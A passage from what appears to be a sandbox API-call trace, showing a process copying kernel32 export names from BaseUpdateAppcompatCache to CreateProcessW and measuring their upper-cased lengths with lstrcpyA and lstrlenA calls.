lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0080.244] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0080.244] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0080.244] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0080.244] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0080.244] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0080.244] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0080.244] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0080.244] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0080.244] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0080.244] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0080.244] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0080.244] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0080.244] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0080.244] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0080.245] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0080.245] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0080.245] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0080.245] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0080.245] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0080.245] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0080.245] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0080.245] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0080.245] lstrlenA (lpString="BEEP") returned 4 [0080.245] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0080.245] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0080.245] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0080.245] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0080.245] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0080.245] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0080.245] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0080.245] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0080.245] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0080.245] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0080.245] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0080.245] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0080.245] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0080.245] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0080.245] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0080.245] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0080.245] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0080.245] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0080.245] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0080.245] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0080.245] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0080.245] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0080.245] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0080.245] lstrlenA (lpString="CANCELIO") returned 8 [0080.245] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0080.245] lstrlenA (lpString="CANCELIOEX") returned 10 [0080.245] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0080.246] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0080.246] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0080.246] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0080.246] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0080.246] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0080.246] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0080.246] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0080.246] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0080.246] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0080.246] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0080.246] lstrlenA (lpString="CHECKELEVATION") returned 14 [0080.246] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0080.246] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0080.246] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0080.246] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0080.246] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0080.246] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0080.246] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0080.246] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0080.246] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0080.246] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0080.246] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0080.246] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0080.246] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0080.246] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0080.246] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0080.246] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0080.246] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0080.246] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0080.246] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0080.246] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0080.246] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0080.246] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0080.246] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0080.246] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0080.246] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0080.246] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0080.247] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0080.247] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0080.247] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0080.247] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0080.247] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0080.247] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0080.247] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0080.247] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0080.247] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0080.247] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0080.247] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0080.247] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0080.247] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0080.247] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0080.247] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0080.247] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0080.247] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0080.247] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0080.247] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0080.247] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0080.247] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0080.247] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0080.247] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0080.247] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0080.247] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0080.247] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0080.247] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0080.247] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0080.247] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0080.247] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0080.247] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0080.247] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0080.247] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0080.247] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0080.247] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0080.247] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0080.247] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0080.247] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0080.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0080.248] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0080.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0080.248] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0080.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0080.248] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0080.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0080.248] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0080.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0080.248] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0080.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0080.248] lstrlenA (lpString="COPYCONTEXT") returned 11 [0080.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0080.248] lstrlenA (lpString="COPYFILEA") returned 9 [0080.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0080.248] lstrlenA (lpString="COPYFILEEXA") returned 11 [0080.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0080.248] lstrlenA (lpString="COPYFILEEXW") returned 11 [0080.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0080.248] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0080.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0080.248] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0080.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0080.248] lstrlenA (lpString="COPYFILEW") returned 9 [0080.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0080.248] lstrlenA (lpString="COPYLZFILE") returned 10 [0080.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0080.248] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0080.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0080.248] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0080.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0080.248] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0080.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0080.248] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0080.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0080.248] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0080.248] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0080.249] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0080.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0080.249] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0080.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0080.249] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0080.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0080.249] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0080.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0080.249] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0080.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0080.249] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0080.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0080.249] lstrlenA (lpString="CREATEEVENTA") returned 12 [0080.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0080.249] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0080.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0080.249] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0080.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0080.249] lstrlenA (lpString="CREATEEVENTW") returned 12 [0080.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0080.249] lstrlenA (lpString="CREATEFIBER") returned 11 [0080.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0080.249] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0080.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0080.249] lstrlenA (lpString="CREATEFILEA") returned 11 [0080.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0080.249] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0080.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0080.249] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0080.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0080.249] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0080.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0080.249] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0080.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0080.249] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0080.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0080.249] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0080.249] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0080.250] lstrlenA (lpString="CREATEFILEW") returned 11 [0080.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0080.250] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0080.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0080.250] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0080.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0080.250] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0080.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0080.250] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0080.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0080.250] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0080.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0080.250] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0080.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0080.250] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0080.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0080.250] lstrlenA (lpString="CREATEJOBSET") returned 12 [0080.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0080.250] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0080.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0080.250] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0080.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0080.250] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0080.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0080.250] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0080.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0080.250] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0080.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0080.250] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0080.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0080.250] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0080.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0080.250] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0080.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0080.250] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0080.250] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0080.250] lstrlenA (lpString="CREATEPIPE") returned 10 [0080.251] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0080.251] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0080.251] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0080.251] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0080.251] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0080.251] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0080.251] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0080.251] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0080.251] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0080.251] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0080.251] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0080.251] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0080.251] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0080.251] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0080.251] lstrcpyA (in: lpString1=0x3f2c7fc, 